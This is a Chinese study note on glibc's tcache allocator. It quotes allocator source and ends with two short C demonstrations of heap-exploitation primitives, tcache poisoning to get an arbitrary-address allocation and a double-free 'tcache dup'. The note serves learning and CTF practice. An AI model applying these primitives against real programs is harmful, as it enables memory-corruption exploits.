Tcache 学习笔记

0x0 Tcache Struct

Tcache新增了两个结构体, 分别是tcache_entry和tcache_perthread_struct

/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

/* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct").  Keeping overall size low is mildly important.  Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread tcache_perthread_struct *tcache = NULL;

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

分析一下这个put和get函数, 这两个函数的判断很少, 只有判断tc_idx和TCACHE max bins的大小.
get函数判断了tcache存不存在, 且大小没有越界, tcache的put和get就是检测很少,仅检测tcache->entries[tc_idx] = e->next;

这两个函数会在函数 int_free 和 __libc_malloc 的开头被调用，其中 tcache_put 当所请求的分配大小不大于0x408并且当给定大小的 tcache bin 未满时调用。一个 tcache bin 中的最大块数mp.tcache_count是7。

0x1 Tcache Usage

内存释放

_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */

  size = chunksize (p);

  /* Little security check which won't hurt performance: the
     allocator never wrapps around at the end of the address space.
     Therefore we can exclude some size values which might appear
     here by accident or by "design" from some intruder.  */
  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
      || __builtin_expect (misaligned_chunk (p), 0))
    malloc_printerr ("free(): invalid pointer");
  /* We know that each chunk is at least MINSIZE bytes in size or a
     multiple of MALLOC_ALIGNMENT.  */
  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
    malloc_printerr ("free(): invalid size");

  check_inuse_chunk(av, p);

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
      && tc_idx < mp_.tcache_bins
      && tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
  }
#endif

......
}

内存申请:
malloc时
（1）首先，申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时，会把该 fastbin 链上的其他内存块放入 tcache 中。
（2）其次，申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时，会把该 smallbin 链上的其他内存块放入 tcache 中。
（3）当在 unsorted bin 链上循环处理时，当找到大小合适的链时，并不直接返回，而是先放到 tcache 中，继续处理。

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      mfastbinptr *fb = &fastbin (av, idx);
      mchunkptr pp;
      victim = *fb;

      if (victim != NULL)
    {
      if (SINGLE_THREAD_P)
        *fb = victim->fd;
      else
        REMOVE_FB (fb, pp, victim);
      if (__glibc_likely (victim != NULL))
        {
          size_t victim_idx = fastbin_index (chunksize (victim));
          if (__builtin_expect (victim_idx != idx, 0))
              malloc_printerr ("malloc(): memory corruption (fast)");
          check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
          /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
          size_t tc_idx = csize2tidx (nb);
          if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
            && (tc_victim = *fb) != NULL)
            {
              if (SINGLE_THREAD_P)
               *fb = tc_victim->fd;
              else
              {
                REMOVE_FB (fb, pp, tc_victim);
                if (__glibc_unlikely (tc_victim == NULL))
                  break;
              }
              tcache_put (tc_victim, tc_idx);
            }
        }
#endif
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }
    }

tcache 取出:在内存申请的开始部分，首先会判断申请大小块，在 tcache 是否存在，如果存在就直接从 tcache 中摘取，否则再使用_int_malloc 分配。

在循环处理unsorted bin内存块时, 如果放入unsorted bin块最大数量, 会立即返回. 默认是0, 即不存在上限.

#if USE_TCACHE
      /* If we've processed as many chunks as we're allowed while
   filling the cache, return one of the cached ones.  */
      ++tcache_unsorted_count;
      if (return_cached
        && mp_.tcache_unsorted_limit > 0
        && tcache_unsorted_count > mp_.tcache_unsorted_limit)
      {
        return tcache_get (tc_idx);
      }
#endif

// 在循环处理 unsorted bin 内存块后，如果之前曾放入过 tcache 块，则会取出一个并返回。

#if USE_TCACHE
      /* If all the small chunks we found ended up cached, return one now.  */
      if (return_cached)
      {
        return tcache_get (tc_idx);
      }
#endif

0x3 Pwn Tcache

tcache poisoning

通过覆盖tcache的next, 即可malloc到任何地址
tcache的next其实就是malloc出来的chunk的第一个User data, 这是因为tcache_entry结构体只有一个next指针.

 1   │ #include <stdio.h>
 2   │ #include <stdlib.h>
 3   │ #include <stdint.h>
 4   │ 
 5   │ int main()
 6   │ {
 7   │         fprintf(stderr, "This file demonstrates a simple tcache poisoning attack
     │  by tricking malloc into\n"
 8   │                "returning a pointer to an arbitrary location (in this case, the 
     │ stack).\n"
 9   │                "The attack is very similar to fastbin corruption attack.\n\n");
10   │ 
11   │         size_t stack_var;
12   │         fprintf(stderr, "The address we want malloc() to return is %p.\n", (char
     │  *)&stack_var);
13   │ 
14   │         fprintf(stderr, "Allocating 1 buffer.\n");
15   │         intptr_t *a = malloc(128);
16   │         fprintf(stderr, "malloc(128): %p\n", a);
17   │         fprintf(stderr, "Freeing the buffer...\n");
18   │         free(a);
19   │ 
20   │         fprintf(stderr, "Now the tcache list has [ %p ].\n", a);
21   │         fprintf(stderr, "We overwrite the first %lu bytes (fd/next pointer) of t
     │ he data at %p\n"
22   │                 "to point to the location to control (%p).\n", sizeof(intptr_t),
     │  a, &stack_var);
23   │         a[0] = (intptr_t)&stack_var;
24   │ 
25   │         fprintf(stderr, "1st malloc(128): %p\n", malloc(128));
26   │         fprintf(stderr, "Now the tcache list has [ %p ].\n", &stack_var);
27   │ 
28   │         intptr_t *b = malloc(128);
29   │         fprintf(stderr, "2st malloc(128): %p\n", b);
30   │         fprintf(stderr, "We got the control\n");
31   │ 
32   │         return 0;
33   │ }

tcache dup

这个版本double free也太…
直接free两次就行..

 1   │ #include <stdio.h>
 2   │ #include <stdlib.h>
 3   │ 
 4   │ int main()
 5   │ {
 6   │         fprintf(stderr, "This file demonstrates a simple double-free attack with
     │  tcache.\n");
 7   │ 
 8   │         fprintf(stderr, "Allocating buffer.\n");
 9   │         int *a = malloc(8);
10   │ 
11   │         fprintf(stderr, "malloc(8): %p\n", a);
12   │         fprintf(stderr, "Freeing twice...\n");
13   │         free(a);
14   │         free(a);
15   │ 
16   │         fprintf(stderr, "Now the free list has [ %p, %p ].\n", a, a);
17   │         fprintf(stderr, "Next allocated buffers will be same: [ %p, %p ].\n", ma
     │ lloc(8), malloc(8));
18   │ 
19   │         return 0;
20   │ }